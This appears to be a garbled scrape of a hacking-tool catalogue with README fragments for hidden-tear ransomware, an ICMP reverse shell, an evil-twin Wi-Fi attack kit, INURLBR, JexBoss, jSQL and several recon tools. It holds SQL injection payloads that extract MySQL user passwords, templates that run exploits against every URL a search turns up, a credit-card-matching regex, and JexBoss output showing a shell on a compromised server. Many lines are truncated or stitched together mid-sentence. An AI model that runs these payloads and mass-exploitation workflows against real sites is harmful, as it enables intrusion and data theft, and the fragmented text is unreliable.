Try watching this video on www.youtube.com, or enable JavaScript if it is
disabled in your browser.
Usage
Legal Warning
While this may be helpful for some, there are significant risks.
hidden tear may be used only for Educational Purposes. Do not
use it as a ransomware! You could go to jail on obstruction of
justice charges just for running hidden tear, even though you
are innocent.
DownloadHidden-tear
HOOK ANALYSER 3.2 - MALWARE ANALYSIS TOOL
Features/Functionality
Release
Network file (PCAP) analysis - Analyse userprovided .PCAP file and performs analysis on
external IP addresses. Example
Social Intelligence (Pulls data from Twitter- for userdefined keywords and performs network analysis).
Example
Important note - The software shall only be used for "NONCOMMERCIAL" purposes. For commercial usage, written
permission from theAuthormust be obtained prior to use.
RESPONSE HEADERS
hsecscan
A security scanner for HTTP response headers.
Requirements
Python 2.x
Usage
$ ./hsecscan.py
usage: hsecscan.py [-h] [-P] [-p] [-u URL] [-R] [-U UserAgent]
-P, --database
database.
-p, --headers
-R, --redirect
Example
$ ./hsecscan.py -u https://google.com
>> RESPONSE INFO <<
URL: https://www.google.com.br/?gfe_rd=cr&ei=Qlg_VuWHqWX8QeHraH4DQ
Code: 200
Headers:
Date: Sun, 08 Nov 2015 14:12:18 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=ISO-8859-1
P3P: CP="This is not a P3P policy! See http://
www.google.com/support/accounts/bin/answer.py?
hl=en&answer=151657 for more info."
Server: gws
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Set-Cookie:
PREF=ID=1111111111111111:FF=0:TM=1446991938:LM=1446991938
:V=1:S=wT722CJeTI8DR-6b; expires=Thu, 31-Dec-2015
16:02:17 GMT; path=/; domain=.google.com.br
Set-Cookie:
NID=73=IQTBy8sF0rXq3cu2hb3JHIYqEarBeft7Ciio6uPF2gChn2tj34
-kRocXzBwPb6-BLABp0grZvHf7LQnRQ9Z_YhGgztoFrns3BMSIGoGn4BWBA48UtsFw4OsB5RZ4ODz1rZb9XjCYemyZw7e5ZJ5
pWftv5DPul0; expires=Mon, 09-May-2016 14:12:18 GMT;
path=/; domain=.google.com.br; HttpOnly
Alternate-Protocol: 443:quic,p=1
Alt-Svc: quic="www.google.com:443"; p="1";
ma=600,quic=":443"; p="1"; ma=600
Accept-Ranges: none
Vary: Accept-Encoding
Connection: close
>> RESPONSE HEADERS DETAILS <<
oFrns3BMSIGoGn4BWBA48UtsFw4OsB5RZ4ODz1rZb9XjCYemyZw7e5ZJ5
pWftv5DPul0; expires=Mon, 09-May-2016 14:12:18 GMT;
path=/; domain=.google.com.br; HttpOnly
Reference: https://tools.ietf.org/html/rfc6265
Security Description: Cookies have a number of security
pitfalls. In particular, cookies encourage developers to
rely on ambient authority for authentication, often
becoming vulnerable to attacks such as cross-site request
forgery. Also, when storing session identifiers in
cookies, developers often create session fixation
vulnerabilities. Transport-layer encryption, such as that
employed in HTTPS, is insufficient to prevent a network
attacker from obtaining or altering a victim's cookies
because the cookie protocol itself has various
vulnerabilities. In addition, by default, cookies do not
provide confidentiality or integrity from network
attackers, even when used in conjunction with HTTPS.
Security Reference: https://tools.ietf.org/html/
rfc6265#section-8
Recommendations: Please at least read these references:
https://tools.ietf.org/html/rfc6265#section-8 and
https://www.owasp.org/index.php/
Session_Management_Cheat_Sheet#Cookies.
CWE: CWE-614: Sensitive Cookie in HTTPS Session Without
'Secure' Attribute
CWE URL: https://cwe.mitre.org/data/definitions/614.html
Header Field Name: Accept-Ranges
Value: none
Reference: https://tools.ietf.org/html/
rfc7233#section-2.3
Security Description: Unconstrained multiple range
requests are susceptible to denial-of-service attacks
because the effort required to request many overlapping
ranges of the same data is tiny compared to the time,
memory, and bandwidth consumed by attempting to serve the
requested data in many parts.
Security Reference: https://tools.ietf.org/html/
rfc7233#section-6
Recommendations: Servers ought to ignore, coalesce, or
reject egregious range requests, such as requests for
more than two overlapping ranges or for many small ranges
in a single set, particularly when the ranges are
requested out of order for no apparent reason.
CWE: CWE-400: Uncontrolled Resource Consumption
('Resource Exhaustion')
CWE URL: https://cwe.mitre.org/data/definitions/400.html
Header Field Name: Expires
Value: -1
Reference: https://tools.ietf.org/html/
rfc7234#section-5.3
Security Description:
Security Reference:
Recommendations:
CWE:
CWE URL:
Header Field Name: Vary
Value: Accept-Encoding
Reference: https://tools.ietf.org/html/
rfc7231#section-7.1.4
Security Description:
Security Reference:
Recommendations:
CWE:
CWE URL:
Header Field Name: Server
Value: gws
Reference: https://tools.ietf.org/html/
rfc7231#section-7.4.2
Security Description: Overly long and detailed Server
field values increase response latency and potentially
reveal internal implementation details that might make it
(slightly) easier for attackers to find and exploit known
security holes.
Security Reference: https://tools.ietf.org/html/
rfc7231#section-7.4.2
Recommendations: An origin server SHOULD NOT generate a
Server field containing needlessly fine-grained detail
and SHOULD limit the addition of subproducts by third
parties.
CWE: CWE-200: Information Exposure
CWE URL: https://cwe.mitre.org/data/definitions/200.html
Header Field Name: Connection
Value: close
Reference: https://tools.ietf.org/html/
rfc7230#section-6.1
Security Description:
Security Reference:
Recommendations:
CWE:
CWE URL:
Header Field Name: Cache-Control
Value: private, max-age=0
Reference: https://tools.ietf.org/html/
rfc7234#section-5.2
Security Description: Caches expose additional potential
vulnerabilities, since the contents of the cache
represent an attractive target for malicious
exploitation.
Security Description:
Security Reference:
Recommendations:
CWE:
CWE URL:
Header Field Name: P3P
Value: CP="This is not a P3P policy! See http://
www.google.com/support/accounts/bin/answer.py?
hl=en&answer=151657 for more info."
Reference: http://www.w3.org/TR/P3P11/#syntax_ext
Security Description: While P3P itself does not include
security mechanisms, it is intended to be used in
conjunction with security tools. Users' personal
information should always be protected with reasonable
security safeguards in keeping with the sensitivity of
the information.
Security Reference: http://www.w3.org/TR/P3P11/
#principles_security
Recommendations: CWE: CWE URL: Header Field Name: Content-Type
Value: text/html; charset=ISO-8859-1
Reference: https://tools.ietf.org/html/
rfc7231#section-3.1.1.5
Security Description: In practice, resource owners do not
always properly configure their origin server to provide
the correct Content-Type for a given representation, with
Download Hsecscan
HTTPIE - A CLI, CURL-LIKE TOOL FOR HUMANS
Installation
(If pip installation fails for some reason, you can try
easy_install httpie as a fallback.)
Development version
The latest development version can be installed directly from
GitHub:
# Mac OS X via Homebrew
$ brew install httpie --HEAD
# Universal
$ pip install --upgrade https://github.com/jkbrzt/httpie/
tarball/master
Usage
Hello World:
$ http httpie.org
Synopsis:
$ http [flags] [METHOD] URL [ITEM [ITEM]]
Submitting forms:
$ http -f POST example.org hello=World
See the request that is being sent using one of the output
options:
$ http -v example.org
The name of the HTTP method comes right before the URL
argument:
$ http DELETE example.org/todos/7
Download HTTPie
HTTPNETWORKSNIFFER V1.50 - PACKET SNIFFER TOOL
THAT CAPTURES ALL HTTP REQUESTS/RESPONSES
You can easily select one or more HTTP information lines, and
then export them to text/html/xml/csv file or copy them to the
clipboard and then paste them into Excel.
System Requirements
/load_file_pcap
<Filename>
/
load_file_netmo
n <Filename>
DownloadHTTPNetworkSniffer v1.50
HYPERFOX - HTTP AND HTTPS TRAFFIC INTERCEPTOR
DownloadHyperfox
I2P - THE INVISIBLE INTERNET PROJECT
Download I2P
ICMPSH - SIMPLE REVERSE ICMP SHELL
Usage
If you miss doing that, you will receive information from the
slave, but the slave is unlikely to receive commands send from
the master.
Running the slave
The slave comes with a few command line options as outlined
below:
-t host
-o milliseconds
-b num
Downloadicmpsh
INFERNAL-TWIN - THIS IS EVIL TWIN ATTACK
AUTOMATED (WIRELESS HACKING)
How to install
$ sudo apt-get install apache2
$ python db_connect_creds.py
dbconnect.conf doesn't exists or creds are incorrect
*************** creating DB config file ************
Enter the DB username: root
Enter the password: *************
trying to connect
username root
FAQ:
I have a problem with connecting to the Database
Solution:
(Thanks to @lightos for this fix)
There seem to be few issues with Database connectivity. The
solution is to create a new user on the database and use that
user for launching the tool. Follow the following steps.
1. Delete dbconnect.conf file from the Infernalwireless folder
Release Notes:
New Features:
Impelemented
WPA2 hacking
WEP Hacking
SSL Strip
Report generation
PDF Report
HTML Report
Network mapping
MiTM
Probe Request
Changes:
Improved compatibility
Report improvement
Bug Fixes:
Coming Soon:
More attacks.
Expected bugs:
Freeze
Download Infernal-Twin
INSTANT PDF PASSWORD PROTECTOR - PASSWORD
PROTECT PDF FILE
standard Encryption methods - RC4/AES (40-bit, 128-bit, 256bit) based upon the desired security level.
In addition to this, it also helps you set advanced restrictions to
prevent Printing, Copying or Modification of target PDF file.
To further secure it, you can also set 'Owner Password' (also
called Permissions Password) to stop anyone from removing
these restrictions.
'PDF Password Protector' includes Installer for quick
installation/un-installation. It works on both 32-bit & 64-bit
platforms starting from Windows XP to Windows 8.
Features
Copying
Printing
Signing
Commenting
Document Assembly
Page Extraction
or
pip install pythonwhois ipwhois ipaddress shodan
Example
$ ./instarecon.py -s <shodan_key> -o ~/Desktop/
github.com.csv github.com
# InstaRecon v0.1 - by Luis Teixeira (teix.co)
# Scanning 1/1 hosts
# Shodan key provided - <shodan_key>
# ____________________ Scanning github.com
____________________ #
# DNS lookups
[*] Domain: github.com
[*] IPs & reverse DNS:
192.30.252.130 - github.com
[*] NS records:
ns4.p16.dynect.net
204.13.251.16 - ns4.p16.dynect.net
ns3.p16.dynect.net
208.78.71.16 - ns3.p16.dynect.net
ns2.p16.dynect.net
204.13.250.16 - ns2.p16.dynect.net
ns1.p16.dynect.net
208.78.70.16 - ns1.p16.dynect.net
[*] MX records:
ALT2.ASPMX.L.GOOGLE.com
173.194.64.27 - oa-in-f27.1e100.net
ASPMX.L.GOOGLE.com
74.125.203.26
ALT3.ASPMX.L.GOOGLE.com
64.233.177.26
ALT4.ASPMX.L.GOOGLE.com
173.194.219.27
ALT1.ASPMX.L.GOOGLE.com
74.125.25.26 - pa-in-f26.1e100.net
# Whois lookups
[*] Whois domain:
Domain Name: github.com
Registry Domain ID: 1264983250_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.markmonitor.com
Registrar URL: http://www.markmonitor.com
Updated Date: 2015-01-08T04:00:18-0800
Creation Date: 2007-10-09T11:20:50-0700
Registrar Registration Expiration Date:
2020-10-09T11:20:50-0700
Registrar: MarkMonitor, Inc.
Registrar IANA ID: 292
Registrar Abuse Contact Email:
abusecomplaints@markmonitor.com
Registrar Abuse Contact Phone: +1.2083895740
asn_registry: arin
net 0:
cidr: 192.30.252.0/22
range: 192.30.252.0 - 192.30.255.255
name: GITHUB-NET4-1
description: GitHub, Inc.
handle: NET-192-30-252-0-1
address: 88 Colin P Kelly Jr Street
city: San Francisco
state: CA
postal_code: 94107
country: US
abuse_emails: abuse@github.com
tech_emails: hostmaster@github.com
created: 2012-11-15 00:00:00
updated: 2013-01-05 00:00:00
# Querying Shodan for open ports
[*] Shodan:
IP: 192.30.252.130
Organization: GitHub
ISP: GitHub
Port: 22
Banner: SSH-2.0-libssh-0.6.0
Key type: ssh-rsa
Key:
AAAAB3NzaC1yc2EAAAABIwAAAQEAq2A7hRGmdnm9tUDbO9IDSwBK6TbQa
+PXYPCPy6rbTrTtw7PH
kccKrpp0yVhp5HdEIcKr6pLlVDBfOLX9QUsyCOV0wzfjIJNlGEYsdlLJi
zHhbn2mUjvSAHQqZETY
P81eFzLQNnPHt4EVVUh7VfDESU84KezmD5QlWpXLmvU31/yMf
+Se8xhHTvKSCZIFImWwoG6mbUoW
f9nzpIoaSjB+weqqUUmpaaasXVal72J+UX2B
+2RPW3RcT0eOzQgqlJL3RKrTJvdsjE3JEAvGq3lG
HSZXy28G3skua2SmVi/
w4yCE6gbODqnTWlg7+wC604ydGXA8VJiS5ap43JXiUFFAaQ==
Fingerprint: 16:27:ac:a5:76:28:2d:36:63:1b:
56:4d:eb:df:a6:48
Port: 80
Banner: HTTP/1.1 301 Moved Permanently
Content-length: 0
Location: https://192.30.252.130/
Connection: close
# Querying Google for subdomains and Linkedin pages, this
might take a while
[*] Possible LinkedIn page: https://au.linkedin.com/
company/github
[*] Subdomains:
blueimp.github.com
199.27.75.133
bounty.github.com
199.27.75.133
designmodo.github.com
199.27.75.133
developer.github.com
199.27.75.133
digitaloxford.github.com
199.27.75.133
documentcloud.github.com
199.27.75.133
education.github.com
50.19.229.116 ec2-50-19-229-116.compute-1.amazonaws.com
50.17.253.231 ec2-50-17-253-231.compute-1.amazonaws.com
54.221.249.148 ec2-54-221-249-148.compute-1.amazonaws.com
enterprise.github.com
54.243.192.65 ec2-54-243-192-65.compute-1.amazonaws.com
54.243.49.169 ec2-54-243-49-169.compute-1.amazonaws.com
erkie.github.com
199.27.75.133
eternicode.github.com
199.27.75.133
facebook.github.com
199.27.75.133
fortawesome.github.com
199.27.75.133
gist.github.com
192.30.252.141 - gist.github.com
guides.github.com
199.27.75.133
h5bp.github.com
199.27.75.133
harvesthq.github.com
199.27.75.133
help.github.com
199.27.75.133
hexchat.github.com
199.27.75.133
hubot.github.com
199.27.75.133
ipython.github.com
199.27.75.133
janpaepke.github.com
199.27.75.133
jgilfelt.github.com
199.27.75.133
jobs.github.com
54.163.15.207 ec2-54-163-15-207.compute-1.amazonaws.com
kangax.github.com
199.27.75.133
karlseguin.github.com
199.27.75.133
kouphax.github.com
199.27.75.133
learnboost.github.com
199.27.75.133
liferay.github.com
199.27.75.133
lloyd.github.com
199.27.75.133
mac.github.com
199.27.75.133
mapbox.github.com
199.27.75.133
matplotlib.github.com
199.27.75.133
mbostock.github.com
199.27.75.133
mdo.github.com
199.27.75.133
mindmup.github.com
199.27.75.133
mrdoob.github.com
199.27.75.133
msysgit.github.com
199.27.75.133
nativescript.github.com
199.27.75.133
necolas.github.com
199.27.75.133
nodeca.github.com
199.27.75.133
onedrive.github.com
199.27.75.133
pages.github.com
199.27.75.133
panrafal.github.com
199.27.75.133
parquet.github.com
199.27.75.133
pnts.github.com
199.27.75.133
raw.github.com
199.27.75.133
rg3.github.com
199.27.75.133
rosedu.github.com
199.27.75.133
schacon.github.com
199.27.75.133
scottjehl.github.com
199.27.75.133
shop.github.com
192.30.252.129 - github.com
shopify.github.com
199.27.75.133
status.github.com
184.73.218.119 ec2-184-73-218-119.compute-1.amazonaws.com
107.20.225.214 ec2-107-20-225-214.compute-1.amazonaws.com
thoughtbot.github.com
199.27.75.133
tomchristie.github.com
199.27.75.133
training.github.com
199.27.75.133
try.github.com
199.27.75.133
twbs.github.com
199.27.75.133
twitter.github.com
199.27.75.133
visualstudio.github.com
54.192.134.13 server-54-192-134-13.syd1.r.cloudfront.net
54.230.135.112 server-54-230-135-112.syd1.r.cloudfront.net
54.192.134.21 server-54-192-134-21.syd1.r.cloudfront.net
54.230.134.194 server-54-230-134-194.syd1.r.cloudfront.net
54.192.133.169 server-54-192-133-169.syd1.r.cloudfront.net
54.192.133.193 server-54-192-133-193.syd1.r.cloudfront.net
54.230.134.145 server-54-230-134-145.syd1.r.cloudfront.net
54.240.176.208 server-54-240-176-208.syd1.r.cloudfront.net
wagerfield.github.com
199.27.75.133
webcomponents.github.com
199.27.75.133
webpack.github.com
199.27.75.133
weheart.github.com
199.27.75.133
192.30.252.150 - ssh.github.com
192.30.252.151 - ssh.github.com
192.30.252.152 - pages.github.com
192.30.252.153 - pages.github.com
192.30.252.154 - pages.github.com
192.30.252.155 - pages.github.com
192.30.252.156 - githubusercontent.github.com
192.30.252.157 - githubusercontent.github.com
192.30.252.158 - githubusercontent.github.com
192.30.252.159 - githubusercontent.github.com
192.30.252.192 - github-smtp2-ext1.iad.github.net
192.30.252.193 - github-smtp2-ext2.iad.github.net
192.30.252.194 - github-smtp2-ext3.iad.github.net
192.30.252.195 - github-smtp2-ext4.iad.github.net
192.30.252.196 - github-smtp2-ext5.iad.github.net
192.30.252.197 - github-smtp2-ext6.iad.github.net
192.30.252.198 - github-smtp2-ext7.iad.github.net
192.30.252.199 - github-smtp2-ext8.iad.github.net
192.30.253.1 - ops-puppetmaster1-cp1-prd.iad.github.com
192.30.253.2 - janky-nix101-cp1-prd.iad.github.com
192.30.253.3 - janky-nix102-cp1-prd.iad.github.com
192.30.253.4 - janky-nix103-cp1-prd.iad.github.com
192.30.253.5 - janky-nix104-cp1-prd.iad.github.com
192.30.253.6 - janky-nix105-cp1-prd.iad.github.com
192.30.253.7 - janky-nix106-cp1-prd.iad.github.com
192.30.253.8 - janky-nix107-cp1-prd.iad.github.com
192.30.253.9 - janky-nix108-cp1-prd.iad.github.com
192.30.253.10 - gw.internaltools-esx1-cp1prd.iad.github.com
192.30.253.11 - janky-chromium101-cp1-prd.iad.github.com
192.30.253.12 - gw.internaltools-esx2-cp1prd.iad.github.com
192.30.253.13 - github-mon2ext-cp1-prd.iad.github.net
192.30.253.16 - github-smtp2a-ext-cp1-prd.iad.github.net
192.30.253.17 - github-smtp2b-ext-cp1-prd.iad.github.net
192.30.253.23 - ops-bastion1-cp1-prd.iad.github.com
192.30.253.30 - github-slowsmtp1-ext-cp1prd.iad.github.net
192.30.254.1 - github-lb3a-cp1-prd.iad.github.com
192.30.254.2 - github-lb3b-cp1-prd.iad.github.com
192.30.254.3 - github-lb3c-cp1-prd.iad.github.com
192.30.254.4 - github-lb3d-cp1-prd.iad.github.com
# Saving output csv file
# Done
Download InstaRecon
INTRIGUE - INTELLIGENCE GATHERING FRAMEWORK
Starting up...
Start a task:
$ bundle exec ./core-cli.rb start dns_lookup_forward
DnsRecord#intrigue.io
true
[+] Starting task
[+] Task complete!
[+] Start Results
DnsRecord#www.intrigue.io
IpAddress#192.0.78.13
[ ] End Results
[+] Task Log:
[ ] : Got allowed option: resolver
[ ] : Allowed option:
{:name=>"resolver", :type=>"String", :regex=>"ip_address"
, :default=>"8.8.8.8"}
[ ] : Regex should match an IP Address
[ ] : No need to convert resolver to a string
[+] : Allowed user_option! {"name"=>"resolver",
"value"=>"8.8.8.8"}
[ ] : Got allowed option: brute_list
[ ] : Allowed option:
{:name=>"brute_list", :type=>"String", :regex=>"alpha_num
eric_list", :default=>["mx", "mx1", "mx2", "www", "ww2",
"ns1", "ns2", "ns3", "test", "mail", "owa", "vpn",
"admin", "intranet", "gateway", "secure", "admin",
"service", "tools", "doc", "docs", "network", "help",
"en", "sharepoint", "portal", "public", "private", "pub",
"zeus", "mickey", "time", "web", "it", "my", "photos",
"safe", "download", "dl", "search", "staging"]}
[ ] : Regex should match an alpha-numeric list
[ ] : No need to convert brute_list to a string
[+] : Allowed user_option! {"name"=>"brute_list",
"value"=>"1,2,3,4,www"}
Check the Alexa top 1000 domains for the existence of security
headers:
$ for x in `cat data/domains.txt | head -n 1000`; do
bundle exec ./core-cli.rb start dns_brute_sub DnsRecord#
$x;done
Intrigue.new
a :attributes key
> entity = {
:type => "String",
:attributes => { :name => "intrigue.io"}
}
# Create a list of options (this can be empty)
> options_list = [
{ :name => "resolver", :value => "8.8.8.8" }
]
> x.start "example", entity_hash, options_list
> id
You can use the tried and true curl utility to request a task run.
Specify the task type, specify an entity, and the appropriate
options:
$ curl -s -X POST -H "Content-Type: application/json" -d
'{ "task": "example", "entity": { "type": "String",
"attributes": { "name": "8.8.8.8" } }, "options": {} }'
http://127.0.0.1:7777/v1/task_runs
Download Intrigue-core
INURLBR - ADVANCED SEARCH IN MULTIPLE SEARCH
ENGINES
Help:
-h
--help
--ajuda
--info
Information script.
[1...24] / [e1..6]]:
[options]:
1
- BING
- YAHOO BR
- ASK
- HAO123 BR
- GOOGLE (API)
- LYCOS
- UOL BR
- YAHOO US
10
- SAPO
11
- DMOZ
12
- GIGABLAST
13
- NEVER
14
- BAIDU BR
15
- YANDEX
16
- ZOO
17
- HOTBOT
18
- ZHONGSOU
19
- HKSEARCH
20
- EZILION
21
- SOGOU
22
- DUCK DUCK GO
23
- BOOROW
24
---------------------------------------SPECIAL MOTORS
---------------------------------------e1
- TOR FIND
e2
- ELEPHANT
e3
- TORSEARCH
e4
- WIKILEAKS
e5
- OTN
e6
- EXPLOITS SHODAN
Example: -q {op}
Usage:
-q 1
-q 5
Using more than one engine:
-q
1,2,5,6,11,24
Using all engines:
-q all
--proxy localhost:8118
--proxy socks5://googleinurl@localhost:9050
--proxy http://admin:12334@172.16.0.90:8080
--proxy-file Set font file to randomize your proxy to
each search engine.
Example: --proxy-file {proxys}
Usage:
--proxy-file proxys_list.txt
--time-proxy 10
--proxy-http-file http_proxys.txt
the script:
It establishes connection with the exploit through
the get method.
Demo: www.alvo.com.br/pasta/index.php?id={exploit}
types:
Then, of course, it also establishes connection with
the exploit through the get method
Demo: www.target.com.br{exploit}
Default:
Example: -t {op}
Usage:
4
-t 1
www.target.com.br/brazil.php?new={exploit}
5
[*]ZEND FRAMEWORK,
[*]ERROR MYSQL,
[*]ERROR MICROSOFT,
[*]ERROR POSTGRESQL,
[*]CMS WORDPRESS,
[*]ERROR JDBC,
[*]ERROR ASP,
[*]ERROR ORACLE,
CFM,
[*]SHELL WEB,
[*]ERROR DB2,
[*]JDBC
[*]ERROS LUA,
[*]ERROR INDEFINITE
--dork '[DORK]site:br[DORK]site:ar
inurl:php[DORK]site:il inurl:asp'
--dork-file Set font file with your search dorks.
Example: --dork-file {dork_file}
Usage:
--dork-file 'dorks.txt'
--exploit-get "?'%270x27;"
--exploit-post
'field1=valor1&field2=valor2&field3=?
0x273exploit;&botao=ok'
--exploit-command '/admin/config.conf'
script:
Example: -a {string}
Usage:
-d
-a '<title>hello world</title>'
-s
vulnerable URLs.
Example: -s {file}
Usage:
-o
-s your_file.txt
-o tests.txt
Attempts when Google blocks your search.
--persist 7
Return validation method post REDIRECT_URL
--ifredirect '/admin/painel.php'
-m
-u
specified.
--gc Enable validation of values with google webcache.
--pr
--range '172.16.0.5#172.16.0.255'
--range-rand '50'
--irc 'irc.rizon.net#inurlbrasil'
--sedmail youemail@inurl.com.br
--delay 10
--time-out 10
--ifurl index.php?id=
--ifcode 200
--ifemail sp.gov.br
--url-reference http://target.com/admin/
user/valid.php
--mp Limits the number of pages in the search engines.
Example: --mp {limit}
Usage:
--mp 50
--sall your_file.txt
_TARGET_'
--command-vul './exploit.sh _TARGET_
output.txt'
--command-vul 'php miniexploit.php -t
_TARGET_ -s output.txt'
--command-all Use this commmand to specify a single
command to EVERY URL found.
Example: --command-all {command}
Usage:
_TARGET_'
--command-all './exploit.sh _TARGET_
output.txt'
--command-all 'php miniexploit.php -t
_TARGET_ -s output.txt'
[!] Observation:
_TARGET_ will be replaced by the URL/target found,
although if the user
doesn't input the get, only the domain will be
executed.
_TARGETFULL_ will be replaced by the original URL /
target found.
argument --exploit-command.
The exploit-command will be identified by the
parameters --command-vul/ --command-all as _EXPLOIT_
--replace Replace values in the target URL.
Example:
Usage:
--replace {value_old[INURL]value_new}
--replace 'index.php?id=[INURL]index.php?
id=1666+and+(SELECT+user,Password+from+mysql.user+limit
+0,1)=1'
--replace 'main.php?id=[INURL]main.php?
id=1+and+substring(@@version,1,1)=1'
--replace 'index.aspx?id=[INURL]index.aspx?
id=1%27'
--remove Remove values in the target URL.
Example: --remove {string}
Usage:
--remove '/admin.php?id=0'
--regexp {regular_expression}
--regexp '(?:4[0-9]{12}(?:[0-9]{3})?|5[1-5]
[0-9]{14}|6011[0-9]{12}|3(?:0[0-5]|[68][0-9])[0-9]{11}|
3[47][0-9]{13})'
IP Addresses:
Usage:
--regexp '((?:(?:25[0-5]|2[0-4][0-9]|[01]?
[0-9][0-9]?)\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9]
[0-9]?))'
EMAIL:
Usage:
--regexp '([\w\d\.\-\_]+)@([\w\d\.\_\-]+)'
---regexp-filter {regular_expression}
EMAIL:
Usage:
---regexp-filter '([\w\d\.\-\_]+)@([\w\d\.
\_\-]+)'
--exploit-all-id 1,2,8,22
--exploit-vul-id 1,2,8,22
--sub-file
--sub-file exploits_get.txt
--sub-get
--sub-get
_TARGET_'
--sub-cmd-vul './exploit.sh _TARGET_
output.txt'
--sub-cmd-vul 'php miniexploit.php -t
_TARGET_ -s output.txt'
--sub-cmd-all Run command to each target found within
the sub-process scope.
Example: --sub-cmd-all {command}
Usage:
_TARGET_'
--sub-cmd-all './exploit.sh _TARGET_
output.txt'
--sub-cmd-all 'php miniexploit.php -t
_TARGET_ -s output.txt'
--port-scan '22,21,23,3306'
sqli=1'
--port-write Send values for door.
Example: --port-write {'value0','value1','value3'}
Usage:
md5(102030)
Usage:
--exploit-get 'user?id=md5(102030)'
base64(102030)
Usage:
--exploit-get 'user?id=base64(102030)'
hex(102030)
Usage:
--exploit-get 'user?id=hex(102030)'
random(8)
Usage:
--exploit-get 'user?id=random(8)'
Usage
To get a list of basic options and switches use:
php inurlbr.php -h
DownloadINURLBR
INVEIGH - A WINDOWS POWERSHELL LLMNR/NBNS
dedicated listener.
5. The local LLMNR/NBNS services do not need to be
disabled on the host system.
6. LLMNR/NBNS spoofer will point victims to host system's
SMB service, keep account lockout scenarios in mind.
7. Kerberos should downgrade for SMB authentication due
to spoofed hostnames not being valid in DNS.
8. Ensure that the LMMNR,NBNS,SMB,HTTP ports are open
within any local firewall on the host system.
9. Output files will be created in current working directory.
10. If you copy/paste challenge/response captures from
output window for password cracking, remove carriage
returns.
Usage
DownloadInveigh
IP THIEF - SIMPLE IP STEALER IN PHP
Download IP Thief
IVRE - A PYTHON NETWORK RECON FRAMEWORK,
BASED ON NMAP, BRO & P0F
Passive recon
The following steps will show some examples of passive
network recon with IVRE. If you only want active (for example,
You need to run bro (2.3 minimum) with the option -b and the
location of the passiverecon.bro file. If you want to run it on
the eth0 interface, for example, run:
# mkdir logs
# bro -b /usr/local/share/ivre/passiverecon/
passiverecon.bro -i eth0
This will produce log files in the logs directory. You need to run
a passivereconworker to process these files. You can try:
$ passivereconworker --directory=logs
This program will not stop by itself. You can (p)kill it, it will
stop gently (as soon as it has finished to process the current
file).
Using p0f
Active recon
Scanning
This will run a standard scan against 1000 random hosts on the
Internet by running 30 nmap processes in parallel. See the
output of runscans --help if you want to do something else.
When it's over, to import the results in the database, run:
$ nmap2db -c ROUTABLE-CAMPAIGN-001 -s MySource -r scans/
ROUTABLE/up
DownloadIVRE
JADX - JAVA SOURCE CODE FROM ANDROID DEX AND
APK FILES
Command line and GUI tools for produce Java source code
from Android Dex and Apk files.
Usage
jadx[-gui] [options] <input file> (.dex, .apk, .jar
or .class)
options:
-d, --output-dir
- output directory
dot file
--raw-cfg
- verbose output
-h, --help
Example:
jadx -d out classes.dex
Download JADX
JAVA LOIC - LOW ORBIT ION CANNON. A JAVA BASED
NETWORK STRESS TESTING APPLICATION
DownloadJava LOIC
JEXBOSS - JBOSS VERIFY AND EXPLOITATION TOOL
JexBoss is a tool for testing and exploiting vulnerabilities in
JBoss Application Server.
REQUIREMENTS
INSTALLATION
To install the latest version of JexBoss, please use the
following commands:
git clone https://github.com/joaomatosf/jexboss.git
cd jexboss
python jexboss.py
FEATURES
The tool and exploits were developed and tested for versions 3,
4, 5 and 6 of the JBoss Application Server.
The exploitation vectors are:
/jmx-console
tested and working in JBoss versions 4, 5 and 6
/web-console/Invoker
tested and working in JBoss versions 4
/invoker/JMXInvokerServlet
tested and working in JBoss versions 4 and 5
USAGE EXAMPLE
--- *
|
| @author:
| @contact: joaomatosf@gmail.com
| @update: https://github.com/joaomatosf/jexboss
#______________________________________________________#
[ OK ]
* Checking jmx-console:
[ VULNERABLE ]
* Checking JMXInvokerServlet:
[ VULNERABLE ]
wait...
* - - - - - - - - - - - - - - - - - - - - LOL - - - - - - - - - - - - - - - - - - - *
* https://site-teste.com:
Linux fwgw 2.6.32-431.29.2.el6.x86_64 #1 SMP Tue Sep 9
21:36:05 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
CentOS release 6.5 (Final)
uid=509(jboss) gid=509(jboss) grupos=509(jboss)
context=system_u:system_r:initrc_t:s0
[Type commands or "exit" to finish]
Shell> pwd
/usr/jboss-6.1.0.Final/bin
[Type commands or "exit" to finish]
Shell> hostname
fwgw
[Type commands or "exit" to finish]
Shell> ls -all /tmp
total 35436
drwxrwxrwt.
4 root root
snortrules-snapshot-2962.tar.gz
-rw-r--r--.
1 root root
32 Out 16 14:51
snortrules-snapshot-2962.tar.gz.md5
-rw-------.
1 root root
-rw-------.
1 root root
yum_save_tx-2014-09-20-17-18nQiKVo.yumtx
-rw-------.
1 root root
1014 Out
6 00:33
yum_save_tx-2014-10-06-00-33vig5iT.yumtx
-rw-------.
1 root root
543 Out
6 02:14
yum_save_tx-2014-10-06-02-143CcA5k.yumtx
-rw-------.
1 root root
yum_save_tx-2014-10-14-03-04Q9ywQt.yumtx
-rw-------.
1 root root
yum_save_tx-2014-10-15-16-004hKzCF.yumtx
[Type commands or "exit" to finish]
Shell>
Download JexBoss
JOHNNY - GUI FOR JOHN THE RIPPER
Download Johnny
JOOMLAVS - A BLACK BOX, JOOMLA VULNERABILITY
SCANNER
--basic-auth
Enumeration options
-a, --scan-all
extensions
-c, --scan-components
-m, --scan-modules
-t, --scan-templates
-q, --quiet
methods
Advanced options
--follow-redirection
Automatically follow
redirections
--no-colour
--proxy
<[protocol://]host:port> HTTP,
authentication credentials
--threads
Download Joomlavs
JSQL INJECTION V0.73 - JAVA TOOL FOR AUTOMATIC
penetration distribution.
jSQL is also included in Black Hat Sec, ArchAssault Project,
BlackArch Linux and Cyborg Hawk Linux.
CHANGE LOG
Coming... i18n arabic russian chinese integration,
next db engines: SQLite Access MSDE...
v0.73 Authentication Basic Digest Negotiate NTLM and
Kerberos, database type selection
v0.7 Batch scan, Github issue reporter, support for 16
db engines, optimized GUI
alpha-v0.6 Speed x 2 (no more hex encoding), 10 db
vendors supported: MySQL Oracle SQLServer PostgreSQL
DB2 Firebird Informix Ingres MaxDb Sybase. JUnit
tests, log4j, i18n integration and more.
0.5 SQL shell, Uploader.
0.4 Admin page search, Brute force (md5 mysql...),
Decoder (decode encode base64 hex md5...).
0.3 Distant file reader, Webshell drop, Terminal for
